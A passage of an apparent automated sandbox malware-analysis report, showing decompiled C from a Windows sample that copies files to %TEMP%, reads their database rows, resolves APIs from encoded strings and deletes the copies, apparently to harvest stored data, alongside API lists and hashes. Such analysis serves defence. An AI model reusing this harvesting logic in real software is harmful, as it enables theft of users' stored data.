                                                                                                                                                                                              				void* _t161;
                                                                                                                                                                                              				intOrPtr* _t166;
                                                                                                                                                                                              				intOrPtr* _t172;
                                                                                                                                                                                              				intOrPtr* _t178;
                                                                                                                                                                                              				void* _t180;
                                                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                                                              				void* _t187;
                                                                                                                                                                                              				intOrPtr _t208;
                                                                                                                                                                                              				intOrPtr _t210;
                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                              				intOrPtr _t222;
                                                                                                                                                                                              				intOrPtr _t226;
                                                                                                                                                                                              				intOrPtr _t227;
                                                                                                                                                                                              				void* _t228;
                                                                                                                                                                                              				void* _t229;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t224 = __esi;
                                                                                                                                                                                              				_t186 = __ebx;
                                                                                                                                                                                              				_t226 = _t227;
                                                                                                                                                                                              				_t187 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t187 = _t187 - 1;
                                                                                                                                                                                              					_t234 = _t187;
                                                                                                                                                                                              				} while (_t187 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t226);
                                                                                                                                                                                              				_push(0x411163);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t227;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t226);
                                                                                                                                                                                              				_push(0x4110ce);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t227;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t186,  &_v40, _t234);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v64, _t234);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(0x41119c);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v60, _t186,  &_v44, _t234);
                                                                                                                                                                                              				_t87 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v68, _v44);
                                                                                                                                                                                              				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
                                                                                                                                                                                              				E00403D2C( &_v72, _v36);
                                                                                                                                                                                              				if(E004076B0(_v72, _t186, _t187) != 0) {
                                                                                                                                                                                              					_t102 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t228 = _t227 + 8;
                                                                                                                                                                                              					__eflags = _t104;
                                                                                                                                                                                              					if(_t104 == 0) {
                                                                                                                                                                                              						E00408120(0x66,  &_v76);
                                                                                                                                                                                              						_t147 =  *0x41b5cc; // 0x41c78c
						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t229 = _t228 + 0x14;
						__eflags = _t149;
						if(_t149 == 0) {
							while(1) {
								_t151 =  *0x41b600; // 0x41c790
								_t153 =  *((intOrPtr*)( *_t151))(_v20);
								__eflags = _t153 - 0x64;
								if(_t153 != 0x64) {
									goto L9;
								}
								_t155 =  *0x41b644; // 0x41c798
								_t159 =  *0x41b588; // 0x41c794
								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
								_pop(_t216);
								E004094C4(_t161,  &_v48, _t216);
								E00403D2C( &_v80, _v48);
								_t166 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
								_t172 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
								_t178 =  *0x41b588; // 0x41c794
								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
								_t229 = _t229 + 0x28;
								E00403C98( &_v92, _t180);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t184 =  *0x41b584; // 0x41b0b4
								 *_t184 =  *_t184 + 1;
								__eflags =  *_t184;
							}
						}
					}
					L9:
					_t106 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t208);
					 *[fs:eax] = _t208;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t222);
					 *[fs:eax] = _t222;
				}
				_pop(_t210);
				 *[fs:eax] = _t210;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: $%TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-2792595090
                                                                                                                                                                                              • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                              • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                                                                                                                                              • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E0040B15C(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				_Unknown_base(*)()* _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				CHAR* _t72;
                                                                                                                                                                                              				_Unknown_base(*)()* _t111;
                                                                                                                                                                                              				intOrPtr* _t157;
                                                                                                                                                                                              				struct HINSTANCE__* _t158;
                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                              				void* _t160;
                                                                                                                                                                                              				intOrPtr _t170;
                                                                                                                                                                                              				intOrPtr _t175;
                                                                                                                                                                                              				intOrPtr _t179;
                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                              				void* _t194;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                                              				intOrPtr _t202;
                                                                                                                                                                                              				intOrPtr _t203;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t202 = _t203;
                                                                                                                                                                                              				_t160 = 0xc;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t160 = _t160 - 1;
                                                                                                                                                                                              				} while (_t160 != 0);
                                                                                                                                                                                              				 *[fs:eax] = _t203;
                                                                                                                                                                                              				E00408120(0x9b,  &_v72);
                                                                                                                                                                                              				_t72 = E00403990(_v72);
                                                                                                                                                                                              				E00408120(0x9a,  &_v76);
                                                                                                                                                                                              				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
                                                                                                                                                                                              				E0040813C(0x9c,  &_v80);
                                                                                                                                                                                              				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
                                                                                                                                                                                              				E0040813C(0x9d,  &_v84);
                                                                                                                                                                                              				 *_t157(E00403D3C(_v84),  &_v68);
                                                                                                                                                                                              				E00408120(0x9e,  &_v88);
                                                                                                                                                                                              				_t158 = LoadLibraryA(E00403990(_v88));
                                                                                                                                                                                              				if(_t158 != 0) {
                                                                                                                                                                                              					E00408120(0x9f,  &_v92);
                                                                                                                                                                                              					_t111 = GetProcAddress(_t158, E00403990(_v92));
                                                                                                                                                                                              					E00408120(0xa0,  &_v96);
                                                                                                                                                                                              					_t192 = GetProcAddress(_t158, E00403990(_v96));
                                                                                                                                                                                              					E00408120(0xa1,  &_v100);
                                                                                                                                                                                              					_v8 = GetProcAddress(_t158, E00403990(_v100));
                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                              					_push( &_v16);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v52);
                                                                                                                                                                                              					if( *_t111() == 0) {
                                                                                                                                                                                              						_push( &_v20);
                                                                                                                                                                                              						_push( &_v12);
                                                                                                                                                                                              						_push(0x200);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              						if( *_t192() == 0) {
                                                                                                                                                                                              							_t194 = _v12 - 1;
                                                                                                                                                                                              							if(_t194 >= 0) {
                                                                                                                                                                                              								_t195 = _t194 + 1;
                                                                                                                                                                                              								_t159 = 0;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									_t179 =  *0x40b130; // 0x40b134
                                                                                                                                                                                              									E004047B4( &_v24, _t179);
                                                                                                                                                                                              									_push( &_v24);
                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                              									_t200 = (_t159 << 3) - _t159;
                                                                                                                                                                                              									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
                                                                                                                                                                                              									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
                                                                                                                                                                                              									_push( &_v68);
                                                                                                                                                                                              									_push(_v16);
                                                                                                                                                                                              									if(_v8() == 0) {
                                                                                                                                                                                              										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
                                                                                                                                                                                              										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
                                                                                                                                                                                              										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
                                                                                                                                                                                              										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
                                                                                                                                                                                              											E00408120(0xa2,  &_v104);
                                                                                                                                                                                              											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t159 = _t159 + 1;
                                                                                                                                                                                              									_t195 = _t195 - 1;
                                                                                                                                                                                              								} while (_t195 != 0);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t170);
                                                                                                                                                                                              				 *[fs:eax] = _t170;
                                                                                                                                                                                              				_push(E0040B3CA);
                                                                                                                                                                                              				E00403508( &_v104, 5);
                                                                                                                                                                                              				E00403B98( &_v84, 2);
                                                                                                                                                                                              				E00403508( &_v76, 2);
                                                                                                                                                                                              				E00403508( &_v36, 3);
                                                                                                                                                                                              				_t175 =  *0x40b130; // 0x40b134
                                                                                                                                                                                              				return E00404224( &_v24, 2, _t175);
                                                                                                                                                                                              			}






































                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                              • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                              • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                                                                                                                                              • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E00401934() {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				intOrPtr* _t19;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr _t28;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t26 = _t28;
                                                                                                                                                                                              				if( *0x41c5ac == 0) {
                                                                                                                                                                                              					return _t2;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(_t26);
                                                                                                                                                                                              					_push(E00401A0A);
                                                                                                                                                                                              					_push( *[fs:edx]);
                                                                                                                                                                                              					 *[fs:edx] = _t28;
                                                                                                                                                                                              					if( *0x41c035 != 0) {
                                                                                                                                                                                              						_push(0x41c5b4);
                                                                                                                                                                                              						L004011CC();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0x41c5ac = 0;
                                                                                                                                                                                              					_t3 =  *0x41c60c; // 0x0
                                                                                                                                                                                              					LocalFree(_t3);
                                                                                                                                                                                              					 *0x41c60c = 0;
                                                                                                                                                                                              					_t19 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                              					while(_t19 != 0x41c5d4) {
                                                                                                                                                                                              						_t1 = _t19 + 8; // 0x0
                                                                                                                                                                                              						VirtualFree( *_t1, 0, 0x8000);
                                                                                                                                                                                              						_t19 =  *_t19;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00401234(0x41c5d4);
                                                                                                                                                                                              					E00401234(0x41c5e4);
                                                                                                                                                                                              					E00401234(0x41c610);
                                                                                                                                                                                              					_t14 =  *0x41c5cc; // 0x0
                                                                                                                                                                                              					while(_t14 != 0) {
                                                                                                                                                                                              						 *0x41c5cc =  *_t14;
                                                                                                                                                                                              						LocalFree(_t14);
                                                                                                                                                                                              						_t14 =  *0x41c5cc; // 0x0
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_pop(_t23);
                                                                                                                                                                                              					 *[fs:eax] = _t23;
                                                                                                                                                                                              					_push(0x401a11);
                                                                                                                                                                                              					if( *0x41c035 != 0) {
                                                                                                                                                                                              						_push(0x41c5b4);
                                                                                                                                                                                              						L004011D4();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0x41c5b4);
                                                                                                                                                                                              					L004011DC();
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x00401997
                                                                                                                                                                                              0x00401997
                                                                                                                                                                                              0x004019a6
                                                                                                                                                                                              0x004019b0
                                                                                                                                                                                              0x004019ba
                                                                                                                                                                                              0x004019bf
                                                                                                                                                                                              0x004019c6
                                                                                                                                                                                              0x004019ca
                                                                                                                                                                                              0x004019d1
                                                                                                                                                                                              0x004019d6
                                                                                                                                                                                              0x004019db
                                                                                                                                                                                              0x004019e1
                                                                                                                                                                                              0x004019e4
                                                                                                                                                                                              0x004019e7
                                                                                                                                                                                              0x004019f3
                                                                                                                                                                                              0x004019f5
                                                                                                                                                                                              0x004019fa
                                                                                                                                                                                              0x004019fa
                                                                                                                                                                                              0x004019ff
                                                                                                                                                                                              0x00401a04
                                                                                                                                                                                              0x00401a09
                                                                                                                                                                                              0x00401a09

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                                                                                                              • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3782394904-0
                                                                                                                                                                                              • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                              • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                                                                                                              • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				WCHAR* _t76;
                                                                                                                                                                                              				intOrPtr* _t91;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                                                              				intOrPtr* _t99;
                                                                                                                                                                                              				intOrPtr* _t132;
                                                                                                                                                                                              				void* _t134;
                                                                                                                                                                                              				intOrPtr* _t136;
                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                              				intOrPtr* _t140;
                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                              				void* _t148;
                                                                                                                                                                                              				void* _t154;
                                                                                                                                                                                              				intOrPtr _t174;
                                                                                                                                                                                              				intOrPtr _t176;
                                                                                                                                                                                              				intOrPtr _t184;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				intOrPtr _t189;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t186 = __esi;
                                                                                                                                                                                              				_t153 = __ebx;
                                                                                                                                                                                              				_t188 = _t189;
                                                                                                                                                                                              				_t154 = 9;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t154 = _t154 - 1;
                                                                                                                                                                                              					_t193 = _t154;
                                                                                                                                                                                              				} while (_t154 != 0);
                                                                                                                                                                                              				_push(_t154);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t188);
                                                                                                                                                                                              				_push(0x410e20);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t189;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t188);
                                                                                                                                                                                              				_push(0x410da0);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t189;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t153,  &_v40, _t193);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v60, _t193);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				_push(E00410E58);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v56, _t153,  &_v44, _t193);
                                                                                                                                                                                              				_t76 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v64, _v44);
                                                                                                                                                                                              				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
                                                                                                                                                                                              				E00403D2C( &_v68, _v36);
                                                                                                                                                                                              				if(E004076B0(_v68, _t153, _t154) != 0) {
                                                                                                                                                                                              					_t91 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t190 = _t189 + 8;
                                                                                                                                                                                              					__eflags = _t93;
                                                                                                                                                                                              					if(_t93 == 0) {
                                                                                                                                                                                              						E00408120(0x65,  &_v72);
                                                                                                                                                                                              						_t132 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t191 = _t190 + 0x14;
                                                                                                                                                                                              						__eflags = _t134;
                                                                                                                                                                                              						if(_t134 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t136 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t138 =  *((intOrPtr*)( *_t136))(_v20);
                                                                                                                                                                                              								__eflags = _t138 - 0x64;
                                                                                                                                                                                              								if(_t138 != 0x64) {
                                                                                                                                                                                              									goto L9;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t140 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
                                                                                                                                                                                              								_t146 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                              								_t191 = _t191 + 0x10;
                                                                                                                                                                                              								E00403C98( &_v80, _t148);
                                                                                                                                                                                              								_push(_v80);
                                                                                                                                                                                              								_push(E00410E68);
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					_t95 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t95))(_v20);
                                                                                                                                                                                              					_t99 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t99))(_v16);
                                                                                                                                                                                              					_pop(_t174);
                                                                                                                                                                                              					 *[fs:eax] = _t174;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t184);
                                                                                                                                                                                              					 *[fs:eax] = _t184;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t176);
                                                                                                                                                                                              				 *[fs:eax] = _t176;
                                                                                                                                                                                              				_push(E00410E27);
                                                                                                                                                                                              				E00403B98( &_v80, 2);
                                                                                                                                                                                              				E004034E4( &_v72);
                                                                                                                                                                                              				E00403B80( &_v68);
                                                                                                                                                                                              				E004034E4( &_v64);
                                                                                                                                                                                              				E00403B98( &_v60, 6);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-3650661790
                                                                                                                                                                                              • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                              • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
